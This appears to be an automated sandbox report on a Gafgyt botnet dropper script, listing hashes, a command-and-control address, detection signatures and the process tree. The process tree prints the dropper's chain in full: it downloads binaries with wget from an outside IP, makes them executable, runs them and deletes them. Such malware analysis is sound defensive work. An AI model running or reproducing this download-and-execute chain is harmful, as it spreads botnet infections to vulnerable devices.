gafgyt | 6e6727498e4e5c70ace009cb48fa6d141ce81f84eac03c79ac95f42b14ff683d

Analysis

max time kernel
96s
max time network
100s
platform
debian-9_mipsel
resource
debian9-mipsel-20231215-en
resource tags

arch:mipselimage:debian9-mipsel-20231215-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
25/01/2024, 06:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

1KB
MD5

b2cfbd80cdf94849b51fb78a928e5d58
SHA1

ce6aaa804e6d7285b704169d491b1f7db0d60507
SHA256

6e6727498e4e5c70ace009cb48fa6d141ce81f84eac03c79ac95f42b14ff683d
SHA512

8c8bedefa4bb62759bef189232eeefb25b0115411c77b290342cd1f0362956783d77f37b2afaaf30a5db6b7be4a339509ab22e91132ae79c030d3f3c6a9e292f

Score

10^/10

gafgyt botnet

Malware Config

Extracted

Family

gafgyt

45.95.169.10:666

Signatures

Detected Gafgyt variant 1 IoCs

resource	yara_rule
behavioral4/files/fstream-1.dat	family_gafgyt

Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/rebirth.arm4	738	rebirth.arm4

Reads system routing table 1 TTPs 1 IoCs

Gets active network interfaces from /proc virtual filesystem.

System Network Configuration Discovery

T1016

description	ioc	Process
File opened for reading	/proc/net/route	rebirth.mpsl

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

System Network Configuration Discovery

T1016

description	ioc	Process
File opened for reading	/proc/net/route	rebirth.mpsl

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/rebirth.mips	wget
File opened for modification	/tmp/rebirth.ppc	wget
File opened for modification	/tmp/rebirth.x86	wget
File opened for modification	/tmp/rebirth.arm7	wget
File opened for modification	/tmp/rebirth.arm4t	wget
File opened for modification	/tmp/rebirth.mpsl	wget
File opened for modification	/tmp/rebirth.arm4	wget
File opened for modification	/tmp/rebirth.arm5	wget
File opened for modification	/tmp/rebirth.arm6	wget
File opened for modification	/tmp/rebirth.i686	wget
File opened for modification	/tmp/rebirth.m68	wget
File opened for modification	/tmp/rebirth.spc	wget
File opened for modification	/tmp/rebirth.sh4	wget

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:723
- /usr/bin/wget
  wget http://45.95.169.10/rebirth.arm4
  2⤵
  - Writes file to tmp directory
  PID:729
- /bin/chmod
  chmod +x rebirth.arm4
  2⤵
  PID:737
- /tmp/rebirth.arm4
  ./rebirth.arm4
  2⤵
  - Executes dropped EXE
  PID:738
- /bin/rm
  rm -rf rebirth.arm4
  2⤵
  PID:740
- /usr/bin/wget
  wget http://45.95.169.10/rebirth.arm4t
  2⤵
  - Writes file to tmp directory
  PID:742
- /bin/chmod
  chmod +x rebirth.arm4t
  2⤵
  PID:747
- /tmp/rebirth.arm4t
  ./rebirth.arm4t
  2⤵
  PID:748
- /bin/rm
  rm -rf rebirth.arm4t
  2⤵
  PID:750
- /usr/bin/wget
  wget http://45.95.169.10/rebirth.arm5
  2⤵
  - Writes file to tmp directory
  PID:751
- /bin/chmod
  chmod +x rebirth.arm5
  2⤵
  PID:752
- /tmp/rebirth.arm5
  ./rebirth.arm5
  2⤵
  PID:753
- /bin/rm
  rm -rf rebirth.arm5
  2⤵
  PID:755
- /usr/bin/wget
  wget http://45.95.169.10/rebirth.arm6
  2⤵
  - Writes file to tmp directory
  PID:756
- /bin/chmod
  chmod +x rebirth.arm6
  2⤵
  PID:757
- /tmp/rebirth.arm6
  ./rebirth.arm6
  2⤵
  PID:758
- /bin/rm
  rm -rf rebirth.arm6
  2⤵
  PID:760
- /usr/bin/wget
  wget http://45.95.169.10/rebirth.i686
  2⤵
  - Writes file to tmp directory
  PID:761
- /bin/chmod
  chmod +x rebirth.i686
  2⤵
  PID:762
- /tmp/rebirth.i686
  ./rebirth.i686
  2⤵
  PID:763
- /bin/rm
  rm -rf rebirth.i686
  2⤵
  PID:765
- /usr/bin/wget
  wget http://45.95.169.10/rebirth.m68
  2⤵
  - Writes file to tmp directory
  PID:766
- /bin/chmod
  chmod +x rebirth.m68
  2⤵
  PID:767
- /tmp/rebirth.m68
  ./rebirth.m68
  2⤵
  PID:768
- /bin/rm
  rm -rf rebirth.m68
  2⤵
  PID:770
- /usr/bin/wget
  wget http://45.95.169.10/rebirth.mips
  2⤵
  - Writes file to tmp directory
  PID:771
- /bin/chmod
  chmod +x rebirth.mips
  2⤵
  PID:772
- /tmp/rebirth.mips
  ./rebirth.mips
  2⤵
  PID:773
- /bin/rm
  rm -rf rebirth.mips
  2⤵
  PID:775
- /usr/bin/wget
  wget http://45.95.169.10/rebirth.mpsl
  2⤵
  - Writes file to tmp directory
  PID:777
- /bin/chmod
  chmod +x rebirth.mpsl
  2⤵
  PID:783
- /tmp/rebirth.mpsl
  ./rebirth.mpsl
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:784
- /bin/rm
  rm -rf rebirth.mpsl
  2⤵
  PID:788
- /usr/bin/wget
  wget http://45.95.169.10/rebirth.ppc
  2⤵
  - Writes file to tmp directory
  PID:789
- /bin/chmod
  chmod +x rebirth.ppc
  2⤵
  PID:794
- /tmp/rebirth.ppc
  ./rebirth.ppc
  2⤵
  PID:796
- /bin/rm
  rm -rf rebirth.ppc
  2⤵
  PID:798
- /usr/bin/wget
  wget http://45.95.169.10/rebirth.spc
  2⤵
  - Writes file to tmp directory
  PID:800
- /bin/chmod
  chmod +x rebirth.spc
  2⤵
  PID:806
- /tmp/rebirth.spc
  ./rebirth.spc
  2⤵
  PID:810
- /bin/rm
  rm -rf rebirth.spc
  2⤵
  PID:813
- /usr/bin/wget
  wget http://45.95.169.10/rebirth.x86
  2⤵
  - Writes file to tmp directory
  PID:814
- /bin/chmod
  chmod +x rebirth.x86
  2⤵
  PID:820
- /tmp/rebirth.x86
  ./rebirth.x86
  2⤵
  PID:821
- /bin/rm
  rm -rf rebirth.x86
  2⤵
  PID:824
- /usr/bin/wget
  wget http://45.95.169.10/rebirth.sh4
  2⤵
  - Writes file to tmp directory
  PID:826
- /bin/chmod
  chmod +x rebirth.sh4
  2⤵
  PID:832
- /tmp/rebirth.sh4
  ./rebirth.sh4
  2⤵
  PID:834
- /bin/rm
  rm -rf rebirth.sh4
  2⤵
  PID:836
- /usr/bin/wget
  wget http://45.95.169.10/rebirth.arm7
  2⤵
  - Writes file to tmp directory
  PID:838
- /bin/chmod
  chmod +x rebirth.arm7
  2⤵
  PID:846
- /tmp/rebirth.arm7
  ./rebirth.arm7
  2⤵
  PID:847
- /bin/rm
  rm -rf rebirth.arm7
  2⤵
  PID:850

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/rebirth.arm4

Filesize
108KB

MD5
fb5cfb28c8938312a3528278742d404d

SHA1
f8ec0f9eaafc09ad3e10d4854bd798b892b2f9f6

SHA256
aa40049525de986cc33f4d7cd663fb09e825d54c68d37244921172bb375ba513

SHA512
4e04556dd0ced7c23ff82257eee81fb10261cdf4e5a99459efc49e8a515485b2b99916bb2301434ca5d90b8e97df788db6448004fa15820435009da395f3d278

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads